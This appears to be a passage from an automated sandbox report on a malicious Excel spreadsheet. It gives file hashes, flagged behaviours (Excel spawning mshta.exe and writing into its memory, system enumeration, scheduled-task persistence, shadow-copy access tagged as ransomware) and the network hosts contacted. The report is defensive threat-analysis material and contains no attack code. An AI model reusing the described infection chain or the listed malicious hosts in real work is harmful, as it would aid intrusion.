SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 ed417838248928f3b940dde15ae54c8d
SHA1 473d41a0c73d76f003cb001a7127acfa58144129
SHA256 3456e1b47c3e092fe921cd3b2172a8c71068affd8f82cf50f2358a26d80bf82c
SHA512 3e9285f120461b15d04a00c007c31d883c8779465c291643c8356b24a6de0cc37f58183242e68efc9d3307e75445063659066fe4a44e7484fbff4e0310f0af83

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 02:27

Reported

2024-11-13 02:29

Platform

win10v2004-20241007-en

Max time kernel

144s

Max time network

140s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2884 wrote to memory of 1820 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 2884 wrote to memory of 1820 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 198.23.212.233:80 198.23.212.233 tcp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 233.212.23.198.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/2884-1-0x00007FFCBCC0D000-0x00007FFCBCC0E000-memory.dmp

memory/2884-0-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

memory/2884-3-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

memory/2884-2-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

memory/2884-5-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-4-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

memory/2884-10-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-11-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-9-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-8-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-13-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-12-0x00007FFC7A4F0000-0x00007FFC7A500000-memory.dmp

memory/2884-17-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-16-0x00007FFC7A4F0000-0x00007FFC7A500000-memory.dmp

memory/2884-18-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-20-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-21-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-19-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-15-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-14-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-7-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-6-0x00007FFC7CBF0000-0x00007FFC7CC00000-memory.dmp

memory/1820-43-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/1820-44-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-46-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-48-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/2884-47-0x00007FFCBCC0D000-0x00007FFCBCC0E000-memory.dmp

memory/1820-52-0x00007FFCBCB70000-0x00007FFCBCD65000-memory.dmp

memory/1820-53-0x00007FF6D76E0000-0x00007FF6D76E8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 f59dbdf0187527f62589cb0e8e7bf603
SHA1 aa5556daa12c1b48340b297ec2ebf38e800d5338
SHA256 30bf72f7907e19a2a21742089c1b93eecbb0e8cbf7334cd0d1cff0e05df3eb3f
SHA512 f445c654db5f08febeb9b67c7fceaf9ca799519cbd0ac732b38e9eef3ecc63c2dbd1351e02e75d3962bf9cb5b2b1c7358674321f480830cc4a89a1f1acbdb70d